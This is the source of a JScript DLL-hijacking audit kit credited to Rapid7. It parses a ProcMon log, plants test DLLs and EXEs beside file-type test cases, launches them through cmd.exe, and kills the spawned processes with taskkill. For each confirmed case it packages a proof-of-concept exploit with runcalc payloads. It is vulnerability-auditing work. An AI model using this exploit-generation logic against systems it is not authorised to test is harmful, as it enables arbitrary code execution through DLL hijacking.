203 lines
5.8 KiB
JavaScript
203 lines
5.8 KiB
JavaScript
/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
|
|
|
|
var oFso = new ActiveXObject("Scripting.FileSystemObject");
|
|
var oShl = new ActiveXObject("WScript.Shell");
|
|
var oCWD = oShl.CurrentDirectory + "";
|
|
|
|
|
|
function print_status(msg) {
|
|
try {
|
|
WScript.StdOut.WriteLine("[*] "+ msg);
|
|
} catch(e) {}
|
|
}
|
|
|
|
function process_list() {
|
|
var res = new Array();
|
|
var wbemFlagReturnImmediately = 0x10;
|
|
var wbemFlagForwardOnly = 0x20;
|
|
var oWMI = GetObject("winmgmts:\\\\localhost\\root\\CIMV2");
|
|
var cPID = oWMI.ExecQuery("SELECT * FROM Win32_Process", "WQL", wbemFlagReturnImmediately | wbemFlagForwardOnly);
|
|
var enumItems = new Enumerator(cPID);
|
|
for (; !enumItems.atEnd(); enumItems.moveNext()) {
|
|
var p = enumItems.item();
|
|
if (p.ExecutablePath && p.ExecutablePath.toLowerCase().indexOf("taskmgr") != -1) continue;
|
|
res.push(p.ProcessId);
|
|
}
|
|
return res;
|
|
}
|
|
|
|
function replace_payloads(dir, src) {
|
|
var base = oFso.GetFolder(dir);
|
|
var files = new Enumerator(base.files);
|
|
for (; !files.atEnd(); files.moveNext()) {
|
|
var entry = files.item().Name.toString().toLowerCase();
|
|
if ( entry.indexOf("exploit.") == -1) {
|
|
if (entry.toString().indexOf(".exe") != -1) {
|
|
try { oFso.CopyFile(src + "\\runcalc.exe", dir + "\\" + entry); } catch(e) { }
|
|
} else {
|
|
try { oFso.CopyFile(src + "\\runcalc.dll", dir + "\\" + entry); } catch(e) { }
|
|
}
|
|
}
|
|
}
|
|
|
|
var subs = new Enumerator(base.SubFolders);
|
|
for (; !subs.atEnd(); subs.moveNext()) {
|
|
var entry = (subs.item() + "").toLowerCase();
|
|
replace_payloads(entry, src);
|
|
}
|
|
}
|
|
|
|
|
|
/* Process Logfile.CSV
|
|
a) Make a list of applications and their associated DLLs
|
|
b) Create a test case for each extension and each DLL
|
|
c) Run each test case and look for "exploited.txt"
|
|
d) Copy confirmed test cases to a new directory
|
|
*/
|
|
|
|
|
|
if (! oFso.FileExists("Logfile.CSV")) {
|
|
print_status("Please save Logfile.CSV to the current directory first");
|
|
WScript.Quit();
|
|
}
|
|
|
|
var procs = process_list();
|
|
print_status("Protecting " + procs.length + " processes");
|
|
|
|
var apps = new Array();
|
|
var fCSV = oFso.OpenTextFile("Logfile.CSV");
|
|
var line = fCSV.ReadLine();
|
|
var iPath = 4;
|
|
var iProc = 1;
|
|
var bits = line.split(",");
|
|
|
|
// Determine which fields are what index
|
|
for (var i=0; i < bits.length; i++) {
|
|
if (bits[i].toLowerCase().indexOf("process name") != -1) {
|
|
iProc = i;
|
|
}
|
|
if (bits[i].toLowerCase().indexOf("path") != -1) {
|
|
iPath = i;
|
|
}
|
|
}
|
|
|
|
// Parse the CSV into a map of each application's loads
|
|
while( ! fCSV.AtEndOfStream ) {
|
|
line = fCSV.ReadLine();
|
|
bits = line.replace(/\",/g, "\"||||").replace(/"/g, '').split("||||");
|
|
|
|
var vApp = bits[iProc].toLowerCase();
|
|
var vPath = bits[iPath].toLowerCase();
|
|
var vExt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\")[0].toLowerCase();
|
|
var vTgt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\");
|
|
vTgt.shift();
|
|
|
|
var vDll = vTgt.join("\\").toLowerCase();
|
|
|
|
if (! apps[vApp]) apps[vApp] = new Array();
|
|
if (! apps[vApp][vExt]) apps[vApp][vExt] = new Array();
|
|
apps[vApp][vExt][vDll] = true;
|
|
}
|
|
|
|
|
|
print_status("Generating and validating test cases...");
|
|
try { oFso.CreateFolder(oCWD + "\\TestCases"); } catch(e) { }
|
|
try { oFso.CreateFolder(oCWD + "\\Exploits"); } catch(e) { }
|
|
|
|
for (var tApp in apps) {
|
|
print_status(" Application: " + tApp);
|
|
|
|
var aBase = oCWD + "\\TestCases\\" + tApp;
|
|
try { oFso.CreateFolder(aBase); } catch(e) { }
|
|
|
|
for (var tExt in apps[tApp]) {
|
|
var eBase = aBase + "\\" + tExt;
|
|
var aExploited = new Array();
|
|
|
|
try { oFso.CreateFolder(eBase); } catch(e) { }
|
|
for (var tDll in apps[tApp][tExt]) {
|
|
var tBits = tDll.split("\\");
|
|
var tName = tBits.pop();
|
|
var dBase = eBase + "\\" + tName;
|
|
try { oFso.CreateFolder(dBase); } catch(e) { }
|
|
|
|
if (aExploited[tName]) continue;
|
|
|
|
// tDll may be a subdirectory + DLL
|
|
tPath = dBase;
|
|
for (var y = 0; y < tBits.length; y++) {
|
|
tPath = tPath + "\\" + tBits[y];
|
|
try { oFso.CreateFolder(tPath); } catch(e) { }
|
|
}
|
|
tPath = tPath + "\\" + tName;
|
|
|
|
try {
|
|
if (tName.toLowerCase().indexOf(".exe") != -1) {
|
|
oFso.CopyFile(oCWD + "\\runtest.exe", tPath);
|
|
} else {
|
|
oFso.CopyFile(oCWD + "\\runtest.dll", tPath);
|
|
}
|
|
} catch(e) { }
|
|
|
|
// Create the actual test case file
|
|
try {
|
|
var a = oFso.CreateTextFile(dBase + "\\exploit." + tExt);
|
|
a.WriteLine("HOWDY!");
|
|
a.Close();
|
|
} catch(e) { }
|
|
|
|
|
|
try {
|
|
// Run the test case
|
|
oShl.CurrentDirectory = dBase;
|
|
oShl.Run("cmd.exe /c start exploit." + tExt, 0);
|
|
} catch(e) { }
|
|
WScript.Sleep(500);
|
|
|
|
var nprocs = process_list();
|
|
var cnt = 0;
|
|
while(nprocs.length == procs.length && cnt < 2) {
|
|
cnt++;
|
|
WScript.Sleep(500);
|
|
nprocs = process_list();
|
|
}
|
|
|
|
// If an application spawned, give it three seconds
|
|
// This helps with ProcMon memory usage as well
|
|
if (nprocs.length > procs.length) {
|
|
WScript.Sleep(3000);
|
|
}
|
|
|
|
var killer = "taskkill /F ";
|
|
for (var i=0; i < nprocs.length; i++) {
|
|
var found = false;
|
|
for (var x=0; x < procs.length; x++) {
|
|
if (nprocs[i] == procs[x]) {
|
|
found = true;
|
|
break;
|
|
}
|
|
}
|
|
if (found) continue;
|
|
killer = killer + "/PID " + nprocs[i] + " ";
|
|
}
|
|
oShl.Run(killer, 0, true);
|
|
|
|
// Check for the file existence
|
|
if (oFso.FileExists(dBase + "\\exploited.txt")) {
|
|
|
|
print_status("Successfully exploited " + tApp + " with ." + tExt + " using " + tName);
|
|
aExploited[tName] = true;
|
|
var xBase = oCWD + "\\Exploits\\" + tApp + "_" + tExt + "_" + tName;
|
|
try { oFso.CreateFolder(xBase); } catch(e) { }
|
|
try { oFso.CopyFolder(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
|
|
try { oFso.CopyFile(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
|
|
try { oFso.DeleteFile(xBase + "\\exploited.txt"); } catch(e) { }
|
|
replace_payloads(xBase, oCWD);
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
}
|
|
|